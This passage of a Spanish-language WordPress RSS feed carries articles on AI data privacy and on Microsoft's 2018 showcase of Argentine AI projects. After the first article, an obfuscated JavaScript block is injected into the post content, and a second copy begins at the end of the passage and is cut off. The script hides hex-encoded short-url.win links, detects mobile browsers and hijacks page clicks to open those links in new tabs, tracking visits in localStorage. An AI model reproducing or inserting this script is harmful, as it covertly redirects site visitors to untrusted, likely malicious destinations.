de datos que necesitan ser procesados, los algoritmos avanzados simplifican el análisis y la toma de decisiones. La inteligencia artificial es la tecnología más adecuada para superar este desafío, pero trae consigo un temor: ¿cómo queda la seguridad y la privacidad de mis datos al adoptarla?

Creemos que la inteligencia artificial es una tecnología con un funcionamiento muy similar a Waze, que se diferencia del GPS y otras aplicaciones de mapas y rutas porque existe la colaboración entre los usuarios. No comparten información personal, como el color o la placa del coche, pero comparten datos relevantes sobre el trayecto, como la velocidad del tráfico, accidentes e incluso el precio del combustible en una gasolinera. Esta información beneficia a todos.

Es exactamente eso lo que sucede con la inteligencia artificial. Los datos siguen siendo de las empresas usuarias, pero todas se beneficiarán de un proceso acelerado de evolución de la tecnología. Esto es porque la misma plataforma es usada por numerosas empresas y, como ella tiene capacidad de aprendizaje, cuanto más estas organizaciones usen la tecnología, más inteligente se quedará. Por lo tanto, si la máquina aprende a calcular el churn de una compañía, esa inteligencia será compartida y, a partir de allí, ayudará a todos los usuarios.

Más que eso, el intercambio de información también posibilita un benchmarking con el mercado en general - no sólo con una empresa específica. Esta colaboración ayuda a las organizaciones a conocer mejor el mercado en el que actúan y tomar decisiones más acertadas para un crecimiento sostenible.

Sin embargo, creemos que, al igual que en Waze, necesita haber un equilibrio entre la privacidad y la colaboración. La privacidad es fundamental para la seguridad de la información de las compañías y para una mayor adopción de la inteligencia artificial. Por otro lado, la colaboración es la clave para la evolución de la plataforma, y ??si no hay cooperación, este proceso será muy lento.

Otra cuestión que preocupa a los gestores es la seguridad de la información. Con la digitalización de los negocios, habrá más sistemas y cosas conectados y, con ello, puertas abiertas para ataques. En el caso de inteligencia artificial, así como en otros sistemas, una de las formas de garantizar la seguridad de los datos es el control de acceso a ellos por medio de políticas y contraseñas.

Es posible, por ejemplo, determinar restricciones de acceso por personas, cargos o áreas. Además, la tecnología permite definir qué aplicaciones o, incluso, campos pueden ser visualizados por los usuarios. Para tener una idea, en el sector de salud, esa restricción permitiría que sólo el médico tuviera acceso a sus exámenes.

Aunque existe un anhelo enorme en relación con los beneficios de tecnologías innovadoras, como la inteligencia artificial, todavía hay mucho temor hacia ellas. Sin embargo, las empresas deben ser conscientes de que adoptar la inteligencia artificial no significa que se van abriendo más o menos y que estarán más o menos seguras que antes. La tecnología impacta el poder de inteligencia de las organizaciones y adoptarla puede ser fundamental para la supervivencia de su empresa en el mercado.

&nbsp;
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/inteligencia-artificial-como-queda-la-privacidad-y-la-seguridad-de-mis-datos/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">86410</post-id>	</item>
		<item>
		<title>Avanza el uso de la Inteligencia Artificial en la Argentina con experiencias en el sector público, privado y ONGs</title>
		<link>https://www.todoenunclick.com/avanza-el-uso-de-la-inteligencia-artificial-en-la-argentina-con-experiencias-en-el-sector-publico-privado-y-ongs/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Thu, 22 Mar 2018 19:05:57 +0000</pubDate>
				<category><![CDATA[Clickeando]]></category>
		<category><![CDATA[AI]]></category>
		<category><![CDATA[Argentina]]></category>
		<category><![CDATA[inteligencia artificial]]></category>
		<category><![CDATA[microsoft]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=86348</guid>

					<description><![CDATA[<p><img width="1024" height="650" src="https://www.todoenunclick.com/wp-content/uploads/2018/03/Microsoft-AI.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Avanza el uso de la Inteligencia Artificial en la Argentina con experiencias en el sector público, privado y ONGs" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2018/03/Microsoft-AI.jpg?w=1024&amp;ssl=1 1024w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2018/03/Microsoft-AI.jpg?resize=252%2C160&amp;ssl=1 252w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2018/03/Microsoft-AI.jpg?resize=768%2C488&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2018/03/Microsoft-AI.jpg?resize=529%2C336&amp;ssl=1 529w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2018/03/Microsoft-AI.jpg?resize=662%2C420&amp;ssl=1 662w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2018/03/Microsoft-AI.jpg?resize=640%2C406&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2018/03/Microsoft-AI.jpg?resize=681%2C432&amp;ssl=1 681w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></p>Se llevó a cabo el Microsoft Data &amp; AI Experience 2018 LATAM, el evento de datos e Inteligencia Artificial (IA) de Microsoft más importante del Cono Sur. En el mismo, la compañía presentó nuevas propuestas en IA, reforzó su compromiso en democratizarla y mostró casos inéditos de su uso en el sector público, el privado y en el tercer sector en Argentina.

La IA no es nueva, como parte de su programa Microsoft AI &amp; Research, desde hace más de 25 años la compañía trabaja en el desarrollo de soluciones que incluyan IA dentro de la vida cotidiana de las personas y de las organizaciones. El programa cuenta con más de 1.000 científicos e ingenieros especializados en 55 diferentes áreas y ubicados en once laboratorios. El objetivo de estos especialistas es desarrollar nuevos usos de estas tecnologías en alianza con gobiernos, universidades e investigadores, para lograr interacciones cada vez más naturales entre la IA y las personas.

Fernando López Iervasi, Director de Negocios y Grandes Empresas de Microsoft Argentina dijo: “La IA no es nueva, la compañía ha sido pionera en innovaciones que anticipan nuestras necesidades. Lo que hoy favorece todo el potencial de esta tecnología es la explosión de datos que estamos viviendo y que puede impulsar un progreso sin precedentes también en nuestro país. Somos optimistas sobre el futuro de la IA y creemos que los avances que hoy vemos en el área resolverán muchos desafíos de la sociedad. Creemos que la tecnología puede ayudarnos a amplificar capacidades humanas como la empatía, la creatividad y la imaginación, y alineado a nuestra Misión, queremos democratizar la Inteligencia Artificial para que cada persona y organización del planeta puedan lograr más”.

El trabajo que Microsoft hace en relación a la IA se basa en tres pilares:
<ul>
 	<li>Innovación líder que extiende capacidades de las personas.</li>
 	<li>Construcción de plataformas que hacen que la innovación sea más rápida y accesible.</li>
 	<li>Enfoque seguro para que la IA sea desarrollada e implementada de manera responsable y ética.</li>
</ul>
Pablo Castro, Director de Ingeniería, Nube, Inteligencia Artificial para Microsoft Corp. presentó nuevas soluciones que muestran cómo la IA está en todos lados sin que las personas lleguen a advertirla: “Permanentemente actualizamos aplicaciones de Office, como Power Point, Word y Excel, que ofrecen cada vez más funciones a los usuarios y se vuelven inteligentes comprendiendo lo que el usuario quiere para facilitar su trabajo, de este modo la AI no se ve pero está presente. Por otro lado, también tenemos aplicaciones que permiten aumentar las capacidades de las personas, tal es el caso de Seeing AI, una aplicación gratuita para el celular diseñada para las personas ciegas o con visión reducida que aprovecha el poder de la IA para describir qué sucede a nuestro alrededor- las personas, textos y objetos e incluso leer por nosotros. O usos más complejos que permiten extender el alcance de los profesionales, tal es el caso del uso de algoritmos de machine learning en enfermedades de pulmón para diagnósticos tempranos en regiones con déficit de radiólogos”, concluyó.

Uno de los desafíos de la IA es lograr conversaciones más naturales. Para esto Skype es una herramienta fundamental, con más de cientos de millones de usuarios, más de 3 mil millones de minutos en llamadas y mil millones de descargas en móviles, hoy es la aplicación más utilizada entre las personas para hablar. Skype Translator es el ejemplo más reciente y visible de los beneficios de la inversión que Microsoft hace en investigación, los expertos detrás de la aplicación se apoyan en machine learning para construir modelos de reconocimiento, idioma y traducción, esto significa que cuanto los usuarios más lo usen, el sistema más aprenderá. Skype Translator elimina barreras lingüísticas y enriquece las comunicaciones con otras personas alrededor del mundo independientemente del idioma y la ubicación. Actualmente está disponible en ocho idiomas para llamadas de voz y más de 50 para mensajes.

<strong>Experiencias en Argentina que están abriendo camino en el uso de IA:</strong>

En el marco del evento, se presentaron casos de uso concreto y sostenido de IA en Argentina en instituciones del sector público, en organizaciones del tercer sector y en empresas.

<strong>Gobierno de Salta:</strong> En junio de 2017, el gobierno de Salta y Microsoft firmaron un acuerdo de colaboración para aplicar la inteligencia artificial en la prevención del embarazo adolescente y la deserción escolar. Los algoritmos inteligentes permiten identificar características en las personas que podrían derivar en alguno de estos problemas y advierten al gobierno para que puedan trabajar en la prevención de los mismos. Se trata de una iniciativa innovadora, única en el país y un gran paso en el proceso de transformación digital de la provincia. Desde hace cuatro años, el gobierno de Salta junto con la Fundación CONIN trabaja usando la tecnología de Microsoft para obtener datos y analizarlos de manera inteligente. Esto les permite proponer políticas basadas en información real que contribuyan a mejorar las condiciones de vida de la población. Durante estos años, se realizaron miles de encuestas exhaustivas a sectores vulnerables de la sociedad, en base a esta metodología se obtuvo información de todo tipo -salud, educación, vivienda, familia, etc.- que procesada de manera inteligente con la Nube de Microsoft Azure permite identificar ciertos patrones.

“Trabajar el desarrollo humano es para nosotros una política pública esto implica una cuestión básica que es conocer la situación en la que se encuentran las personas. Empezamos a trabajar con Microsoft hace 9 años y desarrollamos un modelo que creemos que es revolucionario, que se concentra en las personas y sus realidades. Hoy tenemos más del 50% de las zonas vulnerables relevadas. Manejamos una gran cantidad de información que era compleja de analizar, sobre todo cuando queríamos prevenir situaciones que involucran muchos elementos de un contexto social que es muy amplio. En este punto apareció la IA, que nos da la posibilidad de anticiparnos. A nivel tecnológico, el modelo que desarrollamos tiene un nivel de precisión de casi un 90% de una prueba piloto realizada en Salta capital. Desde el Estado con esta información, nos estamos organizando para hacer un abordaje integral de la situación con los recursos y las capacidades que tenemos. Usamos las soluciones en la Nube de Microsoft para poder resolver situaciones sociales y darles a las personas una mejor calidad de vida” comentó Pablo Abeleira, Coordinador de Tecnología del ministerio de Primera Infancia de la Provincia de Salta.

<strong>Chequeado.com:</strong> Es la primera organización de fact checking (verificación del discurso) de Latinoamérica y cuenta con gran prestigio y visibilidad en medios y redes sociales de la Argentina y la región. Se dedica a la verificación del discurso público y la promoción del acceso a la información y la apertura de datos. Chequean las declaraciones de políticos, economistas, empresarios, personas públicas, medios de comunicación y otras instituciones formadoras de opinión, y las clasifican de “verdadero” a “falso” según su consistencia con los hechos y datos a las que se refieren. Usan Azure para su Chequeabot, una herramienta que permite, a través de procesamiento de lenguaje natural y machine learning, identificar frases chequeables en medios de todo el país para que su redacción pueda verificar si las afirmaciones son verdaderas o falsas.

“El chequeo de datos es una tarea que lleva mucho tiempo y no tenía sentido utilizar el tiempo de las personas valiosas que trabajan con nosotros con tareas repetitivas como la lectura de los medios de todo el país, entonces empezamos a buscar algunas tareas que se podían acelerar y escalar mediante el uso de la tecnología. Empezamos por buscar las frases chequeables, para eso usamos el Chequeabot en Azure, este robot analiza los textos y nos da las frases chequeables. El bot incorpora un componente de machine learning que aprende día a día. Cualquier organización se puede animar a trabajar con Inteligencia Artificial con un equipo pequeño, nosotros empezamos sólo con un desarrollador y llegamos a hacer algo que es único a nivel mundial. No es necesario tener una gran estructura, se puede empezar de a poco, nosotros somos el ejemplo de eso”, comentó Pablo Martín Fernández, director de innovación editorial de Chequeado.com.

<strong>Nubimetrics:</strong> Es una empresa que a través de su herramienta web provee información inteligente de todo lo que pasa en Mercado Libre. Permite a los vendedores tomar decisiones con información objetiva de calidad para potenciar sus ventas y mejorar sus negocios. La plataforma permite identificar oportunidades, conocer cómo complementarse a la competencia y hacer eficiente la operación basada en insights claves. Con sus herramientas de análisis de datos, leen más de 170 millones de publicaciones por día de 17 países de Latinoamérica y las ponen a disposición de los vendedores como información simple e intuitiva. Nubimetrics utiliza servicios de Microsoft Azure tales como Azure Search, HDInsight y Machine Learning para el procesamiento de grandes volúmenes de información. El negocio de Nubimetrics se duplicó en los últimos dos años. La compañía cuenta con 20 empleados en Argentina desde donde manejan las operaciones para toda la región.

El proceso de curación de datos es clave. Nubimetrics tiene 600 TB de información almacenada, esto es información de cuatro años, de todo eso solo el 5% es lo que ofrecen a los clientes. Tomar grandes cantidades de datos y convertirlo en muy poca información, muy relevante 40% del tiempo lo invertimos en curar la información.

“Cuando uno quiere empezar con un proyecto de IA lo más importante es conocer qué problema quieren resolver. La primera etapa es hacer un análisis del problema que se quiere resolver y cómo encararlo. La curiosidad en este sentido es clave. La IA de Microsoft nos ayudó en este sentido, Azure nos permite procesar millones de datos gracias a que ellos nos proveen la infraestructura. Esta tecnología, que antes solamente era accesible para grandes corporaciones, hoy está al alcance de pequeñas y medianas empresas que necesitan procesar un gran volumen de datos a un costo relativamente bajo”, afirmó Pamela Scheurer, co-fundadora y CTO de Nubimetrics.

<strong>Micracel:</strong> Desarrolló un sistema de supervisión vehicular enfocado en la seguridad vial. La solución tiene un diferencial que representó un gran avance para el mercado de oil &amp; gas. Las empresas de esta industria, estaban acostumbradas a controlar una sola velocidad —la máxima absoluta— en los vehículos que transportaban sus productos, el sistema de Micracel permite controlar múltiples velocidades en múltiples zonas. La solución combina datos recolectados por sensores que, a través de la Nube de Microsoft Azure, se procesan para producir información de valor. Lo novedoso, es que hay una gran cantidad de datos que tienen que ver con las personas y con su comportamiento en el campo que, a partir de ahora, pueden analizarse. Esa es información sumamente valiosa ya que, procesada y analizada de manera inteligente, brinda reportes útiles que permiten aumentar la seguridad vial y generan beneficios a las empresas.

Hoy se producen 500 millones de eventos que son analizados en base a 75.000 personas que manejan, y eso se depura en pequeños eventos como: infracciones, exceso de velocidad, cómo gira en las curvas, con qué aceleración, si circula por caminos defectuosos, etc. El conductor tiene que saber si excede límites de velocidad en esos caminos. Es un mapa de riesgo, se hace en forma colaborativa y anónima, sin decir la empresa. Se procesan alrededor de 800 millones de kilómetros anuales y muchas de las empresas logaron reducir los índices de accidentes hasta un 80%. Hoy tienen un sistema de gestión integral que abarca aspectos como: control de documentación, combustible, mantenimiento del vehículo. Trabajan con aproximadamente 1600 clientes de los cuales 600 son empresas muy grandes como: YPF, TOTAL, Chevron, Halliburton, TGS, TGN, Pecom, Weatherford, Praxair, Sullair, etc.

"En el transporte de cargas peligrosas, como combustibles o productos químicos, la conducción en campo es muy exigente y hay muchas variables a las que el vehículo está sometido. Nuestro sistema permite detectar la conducta de las personas, un tipo de control que es muy importante debido a la peligrosidad del contenido que transportan. Dependiendo de cómo uno mire esas variables es que una conducción se puede transformar en más o menos segura. En Micracel identificamos patrones de conducción y logamos que todos manejen bajo esos patrones. Originalmente nacimos con una estructura convencional, con servidores en datacenters propios. Después de los primeros cuatro años, nos dimos cuenta que era necesario empezar a trabajar con máquinas virtuales. Elegimos usar Azure, porque nos resultó muy amigable la migración de nuestro sistema original con mucha facilidad para escalar y encontramos que los servicios de plataforma y alunas aplicaciones Saas nos simplificaron los desarrollos y colateralmente aumentaron la calidad de servicio de cara al cliente. Apostamos a avanzar en nuestro proceso de transformación digital ya que consideramos que la tecnología tiene un potencial enorme en nuestro rubro", explicó Daniel Alessi, director de Micracel.
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 